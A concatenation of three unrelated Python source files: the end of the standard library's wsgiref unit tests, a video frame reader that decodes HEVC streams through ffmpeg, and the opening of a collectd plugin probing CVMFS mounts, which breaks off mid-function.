self.checkAppURI("http://127.0.0.1/spam", SCRIPT_NAME="/spam")
self.checkAppURI("http://127.0.0.1/sp%E4m", SCRIPT_NAME="/sp\xe4m")
self.checkAppURI("http://spam.example.com:2071/",
HTTP_HOST="spam.example.com:2071", SERVER_PORT="2071")
self.checkAppURI("http://spam.example.com/",
SERVER_NAME="spam.example.com")
self.checkAppURI("http://127.0.0.1/",
HTTP_HOST="127.0.0.1", SERVER_NAME="spam.example.com")
self.checkAppURI("https://127.0.0.1/", HTTPS="on")
self.checkAppURI("http://127.0.0.1:8000/", SERVER_PORT="8000",
HTTP_HOST=None)
def testReqURIs(self):
self.checkReqURI("http://127.0.0.1/")
self.checkReqURI("http://127.0.0.1/spam", SCRIPT_NAME="/spam")
self.checkReqURI("http://127.0.0.1/sp%E4m", SCRIPT_NAME="/sp\xe4m")
self.checkReqURI("http://127.0.0.1/spammity/spam",
SCRIPT_NAME="/spammity", PATH_INFO="/spam")
self.checkReqURI("http://127.0.0.1/spammity/sp%E4m",
SCRIPT_NAME="/spammity", PATH_INFO="/sp\xe4m")
self.checkReqURI("http://127.0.0.1/spammity/spam;ham",
SCRIPT_NAME="/spammity", PATH_INFO="/spam;ham")
self.checkReqURI("http://127.0.0.1/spammity/spam;cookie=1234,5678",
SCRIPT_NAME="/spammity", PATH_INFO="/spam;cookie=1234,5678")
self.checkReqURI("http://127.0.0.1/spammity/spam?say=ni",
SCRIPT_NAME="/spammity", PATH_INFO="/spam",QUERY_STRING="say=ni")
self.checkReqURI("http://127.0.0.1/spammity/spam?s%E4y=ni",
SCRIPT_NAME="/spammity", PATH_INFO="/spam",QUERY_STRING="s%E4y=ni")
self.checkReqURI("http://127.0.0.1/spammity/spam", 0,
SCRIPT_NAME="/spammity", PATH_INFO="/spam",QUERY_STRING="say=ni")
def testFileWrapper(self):
self.checkFW("xyz"*50, 120, ["xyz"*40,"xyz"*10])
def testHopByHop(self):
for hop in (
"Connection Keep-Alive Proxy-Authenticate Proxy-Authorization "
"TE Trailers Transfer-Encoding Upgrade"
).split():
for alt in hop, hop.title(), hop.upper(), hop.lower():
self.assertTrue(util.is_hop_by_hop(alt))
# Not comprehensive, just a few random header names
for hop in (
"Accept Cache-Control Date Pragma Trailer Via Warning"
).split():
for alt in hop, hop.title(), hop.upper(), hop.lower():
self.assertFalse(util.is_hop_by_hop(alt))
class HeaderTests(TestCase):
def testMappingInterface(self):
test = [('x','y')]
self.assertEqual(len(Headers()), 0)
self.assertEqual(len(Headers([])),0)
self.assertEqual(len(Headers(test[:])),1)
self.assertEqual(Headers(test[:]).keys(), ['x'])
self.assertEqual(Headers(test[:]).values(), ['y'])
self.assertEqual(Headers(test[:]).items(), test)
self.assertIsNot(Headers(test).items(), test) # must be copy!
h = Headers()
del h['foo'] # should not raise an error
h['Foo'] = 'bar'
for m in h.__contains__, h.get, h.get_all, h.__getitem__:
self.assertTrue(m('foo'))
self.assertTrue(m('Foo'))
self.assertTrue(m('FOO'))
self.assertFalse(m('bar'))
self.assertEqual(h['foo'],'bar')
h['foo'] = 'baz'
self.assertEqual(h['FOO'],'baz')
self.assertEqual(h.get_all('foo'),['baz'])
self.assertEqual(h.get("foo","whee"), "baz")
self.assertEqual(h.get("zoo","whee"), "whee")
self.assertEqual(h.setdefault("foo","whee"), "baz")
self.assertEqual(h.setdefault("zoo","whee"), "whee")
self.assertEqual(h["foo"],"baz")
self.assertEqual(h["zoo"],"whee")
def testRequireList(self):
self.assertRaises(TypeError, Headers, "foo")
def testExtras(self):
h = Headers()
self.assertEqual(str(h),'\r\n')
h.add_header('foo','bar',baz="spam")
self.assertEqual(h['foo'], 'bar; baz="spam"')
self.assertEqual(str(h),'foo: bar; baz="spam"\r\n\r\n')
h.add_header('Foo','bar',cheese=None)
self.assertEqual(h.get_all('foo'),
['bar; baz="spam"', 'bar; cheese'])
self.assertEqual(str(h),
'foo: bar; baz="spam"\r\n'
'Foo: bar; cheese\r\n'
'\r\n'
)
class ErrorHandler(BaseCGIHandler):
"""Simple handler subclass for testing BaseHandler"""
# BaseHandler records the OS environment at import time, but envvars
# might have been changed later by other tests, which trips up
# HandlerTests.testEnviron().
os_environ = dict(os.environ.items())
def __init__(self,**kw):
setup_testing_defaults(kw)
BaseCGIHandler.__init__(
self, BytesIO(), BytesIO(), StringIO(), kw,
multithread=True, multiprocess=True
)
class TestHandler(ErrorHandler):
"""Simple handler subclass for testing BaseHandler, w/error passthru"""
def handle_error(self):
raise # for testing, we want to see what's happening
class HandlerTests(TestCase):
# testEnviron() can produce long error message
maxDiff = 80 * 50
def testEnviron(self):
os_environ = {
# very basic environment
'HOME': '/my/home',
'PATH': '/my/path',
'LANG': 'fr_FR.UTF-8',
# set some WSGI variables
'SCRIPT_NAME': 'test_script_name',
'SERVER_NAME': 'test_server_name',
}
with support.swap_attr(TestHandler, 'os_environ', os_environ):
# override X and HOME variables
handler = TestHandler(X="Y", HOME="/override/home")
handler.setup_environ()
# Check that wsgi_xxx attributes are copied to wsgi.xxx variables
# of handler.environ
for attr in ('version', 'multithread', 'multiprocess', 'run_once',
'file_wrapper'):
self.assertEqual(getattr(handler, 'wsgi_' + attr),
handler.environ['wsgi.' + attr])
# Test handler.environ as a dict
expected = {}
setup_testing_defaults(expected)
        # Handler inherits os_environ variables which are not overridden
# by SimpleHandler.add_cgi_vars() (SimpleHandler.base_env)
for key, value in os_environ.items():
if key not in expected:
expected[key] = value
expected.update({
# X doesn't exist in os_environ
"X": "Y",
            # HOME is overridden by TestHandler
            'HOME': "/override/home",
            # overridden by setup_testing_defaults()
"SCRIPT_NAME": "",
"SERVER_NAME": "127.0.0.1",
# set by BaseHandler.setup_environ()
'wsgi.input': handler.get_stdin(),
'wsgi.errors': handler.get_stderr(),
'wsgi.version': (1, 0),
'wsgi.run_once': False,
'wsgi.url_scheme': 'http',
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.file_wrapper': util.FileWrapper,
})
self.assertDictEqual(handler.environ, expected)
def testCGIEnviron(self):
h = BaseCGIHandler(None,None,None,{})
h.setup_environ()
for key in 'wsgi.url_scheme', 'wsgi.input', 'wsgi.errors':
self.assertIn(key, h.environ)
def testScheme(self):
h=TestHandler(HTTPS="on"); h.setup_environ()
self.assertEqual(h.environ['wsgi.url_scheme'],'https')
h=TestHandler(); h.setup_environ()
self.assertEqual(h.environ['wsgi.url_scheme'],'http')
def testAbstractMethods(self):
h = BaseHandler()
for name in [
'_flush','get_stdin','get_stderr','add_cgi_vars'
]:
self.assertRaises(NotImplementedError, getattr(h,name))
self.assertRaises(NotImplementedError, h._write, "test")
def testContentLength(self):
# Demo one reason iteration is better than write()... ;)
def trivial_app1(e,s):
s('200 OK',[])
return [e['wsgi.url_scheme'].encode('iso-8859-1')]
def trivial_app2(e,s):
s('200 OK',[])(e['wsgi.url_scheme'].encode('iso-8859-1'))
return []
def trivial_app3(e,s):
s('200 OK',[])
return ['\u0442\u0435\u0441\u0442'.encode("utf-8")]
def trivial_app4(e,s):
# Simulate a response to a HEAD request
s('200 OK',[('Content-Length', '12345')])
return []
h = TestHandler()
h.run(trivial_app1)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"Content-Length: 4\r\n"
"\r\n"
"http").encode("iso-8859-1"))
h = TestHandler()
h.run(trivial_app2)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"\r\n"
"http").encode("iso-8859-1"))
h = TestHandler()
h.run(trivial_app3)
self.assertEqual(h.stdout.getvalue(),
b'Status: 200 OK\r\n'
b'Content-Length: 8\r\n'
b'\r\n'
b'\xd1\x82\xd0\xb5\xd1\x81\xd1\x82')
h = TestHandler()
h.run(trivial_app4)
self.assertEqual(h.stdout.getvalue(),
b'Status: 200 OK\r\n'
b'Content-Length: 12345\r\n'
b'\r\n')
def testBasicErrorOutput(self):
def non_error_app(e,s):
s('200 OK',[])
return []
def error_app(e,s):
raise AssertionError("This should be caught by handler")
h = ErrorHandler()
h.run(non_error_app)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"Content-Length: 0\r\n"
"\r\n").encode("iso-8859-1"))
self.assertEqual(h.stderr.getvalue(),"")
h = ErrorHandler()
h.run(error_app)
self.assertEqual(h.stdout.getvalue(),
("Status: %s\r\n"
"Content-Type: text/plain\r\n"
"Content-Length: %d\r\n"
"\r\n" % (h.error_status,len(h.error_body))).encode('iso-8859-1')
+ h.error_body)
self.assertIn("AssertionError", h.stderr.getvalue())
def testErrorAfterOutput(self):
MSG = b"Some output has been sent"
def error_app(e,s):
s("200 OK",[])(MSG)
raise AssertionError("This should be caught by handler")
h = ErrorHandler()
h.run(error_app)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"\r\n".encode("iso-8859-1")+MSG))
self.assertIn("AssertionError", h.stderr.getvalue())
def testHeaderFormats(self):
def non_error_app(e,s):
s('200 OK',[])
return []
stdpat = (
r"HTTP/%s 200 OK\r\n"
r"Date: \w{3}, [ 0123]\d \w{3} \d{4} \d\d:\d\d:\d\d GMT\r\n"
r"%s" r"Content-Length: 0\r\n" r"\r\n"
)
shortpat = (
"Status: 200 OK\r\n" "Content-Length: 0\r\n" "\r\n"
).encode("iso-8859-1")
for ssw in "FooBar/1.0", None:
sw = ssw and "Server: %s\r\n" % ssw or ""
for version in "1.0", "1.1":
for proto in "HTTP/0.9", "HTTP/1.0", "HTTP/1.1":
h = TestHandler(SERVER_PROTOCOL=proto)
h.origin_server = False
h.http_version = version
h.server_software = ssw
h.run(non_error_app)
self.assertEqual(shortpat,h.stdout.getvalue())
h = TestHandler(SERVER_PROTOCOL=proto)
h.origin_server = True
h.http_version = version
h.server_software = ssw
h.run(non_error_app)
if proto=="HTTP/0.9":
self.assertEqual(h.stdout.getvalue(),b"")
else:
self.assertTrue(
re.match((stdpat%(version,sw)).encode("iso-8859-1"),
h.stdout.getvalue()),
((stdpat%(version,sw)).encode("iso-8859-1"),
h.stdout.getvalue())
)
def testBytesData(self):
def app(e, s):
s("200 OK", [
("Content-Type", "text/plain; charset=utf-8"),
])
return [b"data"]
h = TestHandler()
h.run(app)
self.assertEqual(b"Status: 200 OK\r\n"
b"Content-Type: text/plain; charset=utf-8\r\n"
b"Content-Length: 4\r\n"
b"\r\n"
b"data",
h.stdout.getvalue())
def testCloseOnError(self):
side_effects = {'close_called': False}
MSG = b"Some output has been sent"
def error_app(e,s):
s("200 OK",[])(MSG)
class CrashyIterable(object):
def __iter__(self):
while True:
yield b'blah'
raise AssertionError("This should be caught by handler")
def close(self):
side_effects['close_called'] = True
return CrashyIterable()
h = ErrorHandler()
h.run(error_app)
self.assertEqual(side_effects['close_called'], True)
def testPartialWrite(self):
written = bytearray()
class PartialWriter:
def write(self, b):
partial = b[:7]
written.extend(partial)
return len(partial)
def flush(self):
pass
environ = {"SERVER_PROTOCOL": "HTTP/1.0"}
h = SimpleHandler(BytesIO(), PartialWriter(), sys.stderr, environ)
msg = "should not do partial writes"
with self.assertWarnsRegex(DeprecationWarning, msg):
h.run(hello_app)
self.assertEqual(b"HTTP/1.0 200 OK\r\n"
b"Content-Type: text/plain\r\n"
b"Date: Mon, 05 Jun 2006 18:49:54 GMT\r\n"
b"Content-Length: 13\r\n"
b"\r\n"
b"Hello, world!",
written)
def testClientConnectionTerminations(self):
environ = {"SERVER_PROTOCOL": "HTTP/1.0"}
for exception in (
ConnectionAbortedError,
BrokenPipeError,
ConnectionResetError,
):
with self.subTest(exception=exception):
class AbortingWriter:
def write(self, b):
raise exception
stderr = StringIO()
h = SimpleHandler(BytesIO(), AbortingWriter(), stderr, environ)
h.run(hello_app)
self.assertFalse(stderr.getvalue())
def testDontResetInternalStateOnException(self):
class CustomException(ValueError):
pass
# We are raising CustomException here to trigger an exception
# during the execution of SimpleHandler.finish_response(), so
# we can easily test that the internal state of the handler is
# preserved in case of an exception.
class AbortingWriter:
def write(self, b):
raise CustomException
stderr = StringIO()
environ = {"SERVER_PROTOCOL": "HTTP/1.0"}
h = SimpleHandler(BytesIO(), AbortingWriter(), stderr, environ)
h.run(hello_app)
self.assertIn("CustomException", stderr.getvalue())
# Test that the internal state of the handler is preserved.
self.assertIsNotNone(h.result)
self.assertIsNotNone(h.headers)
self.assertIsNotNone(h.status)
self.assertIsNotNone(h.environ)
if __name__ == "__main__":
unittest.main()
|
framereader.py
|
# pylint: skip-file
import json
import os
import pickle
import queue
import struct
import subprocess
import tempfile
import threading
from functools import wraps
import numpy as np
from aenum import Enum
from lru import LRU
import _io
from tools.lib.cache import cache_path_for_file_path
from tools.lib.exceptions import DataUnreadableError
from tools.lib.file_helpers import atomic_write_in_dir
try:
from xx.chffr.lib.filereader import FileReader
except ImportError:
from tools.lib.filereader import FileReader
HEVC_SLICE_B = 0
HEVC_SLICE_P = 1
HEVC_SLICE_I = 2
class GOPReader:
def get_gop(self, num):
# returns (start_frame_num, num_frames, frames_to_skip, gop_data)
raise NotImplementedError
class DoNothingContextManager:
def __enter__(self):
return self
def __exit__(self, *x):
pass
class FrameType(Enum):
raw = 1
h265_stream = 2
def fingerprint_video(fn):
with FileReader(fn) as f:
header = f.read(4)
if len(header) == 0:
raise DataUnreadableError("%s is empty" % fn)
elif header == b"\x00\xc0\x12\x00":
return FrameType.raw
elif header == b"\x00\x00\x00\x01":
if 'hevc' in fn:
return FrameType.h265_stream
else:
raise NotImplementedError(fn)
else:
raise NotImplementedError(fn)
def ffprobe(fn, fmt=None):
cmd = ["ffprobe",
"-v", "quiet",
"-print_format", "json",
"-show_format", "-show_streams"]
if fmt:
cmd += ["-f", fmt]
cmd += [fn]
try:
ffprobe_output = subprocess.check_output(cmd)
except subprocess.CalledProcessError:
raise DataUnreadableError(fn)
return json.loads(ffprobe_output)
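# Index a raw bitstream with the bundled vidindex helper: each index row is a (slice_type, byte_offset)
# pair, terminated by a 0xFFFFFFFF sentinel row that records the total file size.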
def vidindex(fn, typ):
vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex")
vidindex = os.path.join(vidindex_dir, "vidindex")
subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null", "w"))
with tempfile.NamedTemporaryFile() as prefix_f, \
tempfile.NamedTemporaryFile() as index_f:
try:
subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name])
except subprocess.CalledProcessError:
raise DataUnreadableError("vidindex failed on file %s" % fn)
with open(index_f.name, "rb") as f:
index = f.read()
with open(prefix_f.name, "rb") as f:
prefix = f.read()
index = np.frombuffer(index, np.uint32).reshape(-1, 2)
assert index[-1, 0] == 0xFFFFFFFF
assert index[-1, 1] == os.path.getsize(fn)
return index, prefix
def cache_fn(func):
@wraps(func)
def cache_inner(fn, *args, **kwargs):
if kwargs.pop('no_cache', None):
cache_path = None
else:
cache_prefix = kwargs.pop('cache_prefix', None)
cache_path = cache_path_for_file_path(fn, cache_prefix)
if cache_path and os.path.exists(cache_path):
with open(cache_path, "rb") as cache_file:
cache_value = pickle.load(cache_file)
else:
cache_value = func(fn, *args, **kwargs)
if cache_path:
with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
pickle.dump(cache_value, cache_file, -1)
return cache_value
return cache_inner
@cache_fn
def index_stream(fn, typ):
assert typ in ("hevc", )
with FileReader(fn) as f:
assert os.path.exists(f.name), fn
index, prefix = vidindex(f.name, typ)
probe = ffprobe(f.name, typ)
return {
'index': index,
'global_prefix': prefix,
'probe': probe
}
def index_videos(camera_paths, cache_prefix=None):
"""Requires that paths in camera_paths are contiguous and of the same type."""
if len(camera_paths) < 1:
raise ValueError("must provide at least one video to index")
frame_type = fingerprint_video(camera_paths[0])
for fn in camera_paths:
index_video(fn, frame_type, cache_prefix)
def index_video(fn, frame_type=None, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if os.path.exists(cache_path):
return
if frame_type is None:
    frame_type = fingerprint_video(fn)
if frame_type == FrameType.h265_stream:
index_stream(fn, "hevc", cache_prefix=cache_prefix)
else:
raise NotImplementedError("Only h265 supported")
def get_video_index(fn, frame_type, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if not os.path.exists(cache_path):
index_video(fn, frame_type, cache_prefix)
if not os.path.exists(cache_path):
return None
with open(cache_path, "rb") as cache_file:
return pickle.load(cache_file)
def read_file_check_size(f, sz, cookie):
buff = bytearray(sz)
bytes_read = f.readinto(buff)
assert bytes_read == sz, (bytes_read, sz)
return buff
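# Convert an RGB24 image to planar YUV420: a full-resolution luma plane followed by
# 2x2-averaged U and V planes offset by 128.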
def rgb24toyuv420(rgb):
yuv_from_rgb = np.array([[ 0.299 , 0.587 , 0.114 ],
[-0.14714119, -0.28886916, 0.43601035 ],
[ 0.61497538, -0.51496512, -0.10001026 ]])
img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape)
y_len = img.shape[0] * img.shape[1]
uv_len = y_len // 4
ys = img[:, :, 0]
us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128
vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128
yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype)
yuv420[:y_len] = ys.reshape(-1)
yuv420[y_len:y_len + uv_len] = us.reshape(-1)
yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1)
return yuv420.clip(0, 255).astype('uint8')
def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt):
# using a tempfile is much faster than proc.communicate for some reason
with tempfile.TemporaryFile() as tmpf:
tmpf.write(rawdat)
tmpf.seek(0)
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
proc = subprocess.Popen(
["ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
"-vsync", "0",
"-f", vid_fmt,
"-flags2", "showall",
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
      stdin=tmpf, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb"))
# dat = proc.communicate()[0]
dat = proc.stdout.read()
if proc.wait() != 0:
raise DataUnreadableError("ffmpeg failed")
if pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3)
elif pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h*w*3//2))
elif pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w)
else:
raise NotImplementedError
return ret
class BaseFrameReader:
# properties: frame_type, frame_count, w, h
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def close(self):
pass
def get(self, num, count=1, pix_fmt="yuv420p"):
raise NotImplementedError
def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, index_data=None):
frame_type = fingerprint_video(fn)
if frame_type == FrameType.raw:
return RawFrameReader(fn)
elif frame_type in (FrameType.h265_stream,):
if not index_data:
index_data = get_video_index(fn, frame_type, cache_prefix)
return StreamFrameReader(fn, frame_type, index_data, readahead=readahead, readbehind=readbehind)
else:
raise NotImplementedError(frame_type)
class RawData:
def __init__(self, f):
self.f = _io.FileIO(f, 'rb')
self.lenn = struct.unpack("I", self.f.read(4))[0]
    self.count = os.path.getsize(f) // (self.lenn+4)
def read(self, i):
self.f.seek((self.lenn+4)*i + 4)
return self.f.read(self.lenn)
class RawFrameReader(BaseFrameReader):
def __init__(self, fn):
# raw camera
self.fn = fn
self.frame_type = FrameType.raw
self.rawfile = RawData(self.fn)
self.frame_count = self.rawfile.count
self.w, self.h = 640, 480
def load_and_debayer(self, img):
img = np.frombuffer(img, dtype='uint8').reshape(960, 1280)
cimg = np.dstack([img[0::2, 1::2], ((img[0::2, 0::2].astype("uint16") + img[1::2, 1::2].astype("uint16")) >> 1).astype("uint8"), img[1::2, 0::2]])
return cimg
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
assert num+count <= self.frame_count
if pix_fmt not in ("yuv420p", "rgb24"):
raise ValueError("Unsupported pixel format %r" % pix_fmt)
app = []
for i in range(num, num+count):
dat = self.rawfile.read(i)
rgb_dat = self.load_and_debayer(dat)
if pix_fmt == "rgb24":
app.append(rgb_dat)
elif pix_fmt == "yuv420p":
app.append(rgb24toyuv420(rgb_dat))
else:
raise NotImplementedError
return app
class VideoStreamDecompressor:
def __init__(self, vid_fmt, w, h, pix_fmt):
self.vid_fmt = vid_fmt
self.w = w
self.h = h
self.pix_fmt = pix_fmt
if pix_fmt == "yuv420p":
self.out_size = w*h*3//2 # yuv420p
elif pix_fmt in ("rgb24", "yuv444p"):
self.out_size = w*h*3
else:
raise NotImplementedError
self.out_q = queue.Queue()
threads = os.getenv("FFMPEG_THREADS", "0")
cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
self.proc = subprocess.Popen(
["ffmpeg",
"-threads", threads,
"-hwaccel", "none" if not cuda else "cuda",
"-c:v", "hevc",
# "-avioflags", "direct",
"-analyzeduration", "0",
"-probesize", "32",
"-flush_packets", "0",
# "-fflags", "nobuffer",
"-vsync", "0",
"-f", vid_fmt,
"-i", "pipe:0",
"-threads", threads,
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb"))
def read_thread():
while True:
r = self.proc.stdout.read(self.out_size)
if len(r) == 0:
break
assert len(r) == self.out_size
self.out_q.put(r)
self.t = threading.Thread(target=read_thread)
self.t.daemon = True
self.t.start()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def write(self, rawdat):
self.proc.stdin.write(rawdat)
self.proc.stdin.flush()
def read(self):
dat = self.out_q.get(block=True)
if self.pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3))
elif self.pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8)
elif self.pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w))
else:
assert False
return ret
def eos(self):
self.proc.stdin.close()
def close(self):
self.proc.stdin.close()
self.t.join()
    assert self.proc.wait() == 0
class StreamGOPReader(GOPReader):
def __init__(self, fn, frame_type, index_data):
assert frame_type == FrameType.h265_stream
self.fn = fn
self.frame_type = frame_type
self.frame_count = None
self.w, self.h = None, None
self.prefix = None
self.index = None
self.index = index_data['index']
self.prefix = index_data['global_prefix']
probe = index_data['probe']
self.prefix_frame_data = None
self.num_prefix_frames = 0
self.vid_fmt = "hevc"
i = 0
while i < self.index.shape[0] and self.index[i, 0] != HEVC_SLICE_I:
i += 1
self.first_iframe = i
assert self.first_iframe == 0
self.frame_count = len(self.index) - 1
self.w = probe['streams'][0]['width']
self.h = probe['streams'][0]['height']
def _lookup_gop(self, num):
frame_b = num
while frame_b > 0 and self.index[frame_b, 0] != HEVC_SLICE_I:
frame_b -= 1
frame_e = num + 1
while frame_e < (len(self.index) - 1) and self.index[frame_e, 0] != HEVC_SLICE_I:
frame_e += 1
offset_b = self.index[frame_b, 1]
offset_e = self.index[frame_e, 1]
return (frame_b, frame_e, offset_b, offset_e)
def get_gop(self, num):
frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num)
assert frame_b <= num < frame_e
num_frames = frame_e - frame_b
with FileReader(self.fn) as f:
f.seek(offset_b)
rawdat = f.read(offset_e - offset_b)
if num < self.first_iframe:
assert self.prefix_frame_data
rawdat = self.prefix_frame_data + rawdat
rawdat = self.prefix + rawdat
skip_frames = 0
if num < self.first_iframe:
skip_frames = self.num_prefix_frames
return frame_b, num_frames, skip_frames, rawdat
class GOPFrameReader(BaseFrameReader):
#FrameReader with caching and readahead for formats that are group-of-picture based
def __init__(self, readahead=False, readbehind=False):
self.open_ = True
self.readahead = readahead
self.readbehind = readbehind
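    # decoded frames are cached by (frame_number, pix_fmt); the LRU bounds memory to 64 frames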
self.frame_cache = LRU(64)
if self.readahead:
self.cache_lock = threading.RLock()
self.readahead_last = None
self.readahead_len = 30
self.readahead_c = threading.Condition()
self.readahead_thread = threading.Thread(target=self._readahead_thread)
self.readahead_thread.daemon = True
self.readahead_thread.start()
else:
self.cache_lock = DoNothingContextManager()
def close(self):
if not self.open_:
return
self.open_ = False
if self.readahead:
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
self.readahead_thread.join()
def _readahead_thread(self):
while True:
self.readahead_c.acquire()
try:
if not self.open_:
break
self.readahead_c.wait()
finally:
self.readahead_c.release()
if not self.open_:
break
assert self.readahead_last
num, pix_fmt = self.readahead_last
if self.readbehind:
for k in range(num - 1, max(0, num - self.readahead_len), -1):
self._get_one(k, pix_fmt)
else:
for k in range(num, min(self.frame_count, num + self.readahead_len)):
self._get_one(k, pix_fmt)
def _get_one(self, num, pix_fmt):
assert num < self.frame_count
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
with self.cache_lock:
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
frame_b, num_frames, skip_frames, rawdat = self.get_gop(num)
ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt)
ret = ret[skip_frames:]
assert ret.shape[0] == num_frames
for i in range(ret.shape[0]):
self.frame_cache[(frame_b+i, pix_fmt)] = ret[i]
return self.frame_cache[(num, pix_fmt)]
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
if num + count > self.frame_count:
raise ValueError("{} > {}".format(num + count, self.frame_count))
if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"):
raise ValueError("Unsupported pixel format %r" % pix_fmt)
ret = [self._get_one(num + i, pix_fmt) for i in range(count)]
if self.readahead:
self.readahead_last = (num+count, pix_fmt)
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
return ret
class StreamFrameReader(StreamGOPReader, GOPFrameReader):
def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False):
StreamGOPReader.__init__(self, fn, frame_type, index_data)
GOPFrameReader.__init__(self, readahead, readbehind)
def GOPFrameIterator(gop_reader, pix_fmt):
  # TODO: this bookkeeping is ugly and could use a refactor; read_work tracks
  # [frames still to skip, frames still to yield] for each GOP queued in the decoder.
IN_FLIGHT_GOPS = 6 # should be enough that the stream decompressor starts returning data
with VideoStreamDecompressor(gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt) as dec:
read_work = []
def readthing():
# print read_work, dec.out_q.qsize()
outf = dec.read()
read_thing = read_work[0]
if read_thing[0] > 0:
read_thing[0] -= 1
else:
assert read_thing[1] > 0
yield outf
read_thing[1] -= 1
if read_thing[1] == 0:
read_work.pop(0)
i = 0
while i < gop_reader.frame_count:
frame_b, num_frames, skip_frames, gop_data = gop_reader.get_gop(i)
dec.write(gop_data)
i += num_frames
read_work.append([skip_frames, num_frames])
while len(read_work) >= IN_FLIGHT_GOPS:
for v in readthing():
yield v
dec.eos()
while read_work:
for v in readthing():
yield v
def FrameIterator(fn, pix_fmt, **kwargs):
fr = FrameReader(fn, **kwargs)
if isinstance(fr, GOPReader):
for v in GOPFrameIterator(fr, pix_fmt):
yield v
else:
for i in range(fr.frame_count):
yield fr.get(i, pix_fmt=pix_fmt)[0]
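# Minimal usage sketch, assuming the FrameReader factory referenced above and an
# HEVC segment on disk (the path below is hypothetical):
#
#   for frame in FrameIterator("/data/segment/fcamera.hevc", "rgb24"):
#       ...  # each item is an (h, w, 3) uint8 array, matching VideoStreamDecompressor.read()
#
# With pix_fmt="yuv420p" each item is instead a flat uint8 buffer of w*h*3//2 bytes.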
|
__init__.py
|
import collectd
import xattr
import os
import psutil
import threading
import time
import uuid
try:
from os import scandir
except ImportError:
from scandir import scandir
CVMFS_ROOT = '/cvmfs'
PLUGIN_NAME = 'cvmfs'
CONFIG_DEFAULT_MEMORY = True
CONFIG_DEFAULT_MOUNTTIME = True
CONFIG_DEFAULT_INTERVAL = -1
CONFIG_DEFAULT_MOUNTTIMEOUT = 5
class CvmfsProbeConfig(object):
def __init__(self):
self.repos = []
self.attributes = []
self.memory = CONFIG_DEFAULT_MEMORY
self.mounttime = CONFIG_DEFAULT_MOUNTTIME
self.mounttimeout = CONFIG_DEFAULT_MOUNTTIMEOUT
self.interval = CONFIG_DEFAULT_INTERVAL
self.config_name = uuid.uuid4().hex
self.verbose = False
def __str__(self):
return "CvmfsProbeConfig - Repos: {0} - Attributes: {1} - Memory: {2} - MountTime: {3} - Interval: {4} - ConfigName: {5} - Verbose: {6}".format(
self.repos,
self.attributes,
self.memory,
self.mounttime,
"%ss" % self.interval if self.interval > 0 else "global interval",
self.config_name,
self.verbose
)
class CvmfsProbe(object):
def debug(self, msg, verbose=False):
if verbose:
collectd.info('{0} plugin: {1}'.format(PLUGIN_NAME, msg))
def safe_scandir(self, directory, timeout):
contents = []
t = threading.Thread(target=lambda: contents.extend(scandir(directory)))
t.daemon = True
t.start()
t.join(timeout)
if t.is_alive():
raise Exception("Scandir timed out after {0} seconds".format(timeout))
return contents
def read_mounttime(self, repo_mountpoint, timeout):
start = time.time()
self.safe_scandir(repo_mountpoint, timeout)
end = time.time()
        # Did we really mount it? Reading the user.fqrn xattr only succeeds on a
        # correctly mounted repository.
        try:
            xattr.getxattr(repo_mountpoint, 'user.fqrn')
            return end - start
        except Exception:
            raise Exception("Repository was not mounted correctly")
def read_memory(self, repo_mountpoint):
repo_pid = int(xattr.getxattr(repo_mountpoint, 'user.pid'))
process = psutil.Process(repo_pid)
if callable(getattr(process, "get_memory_info", None)):
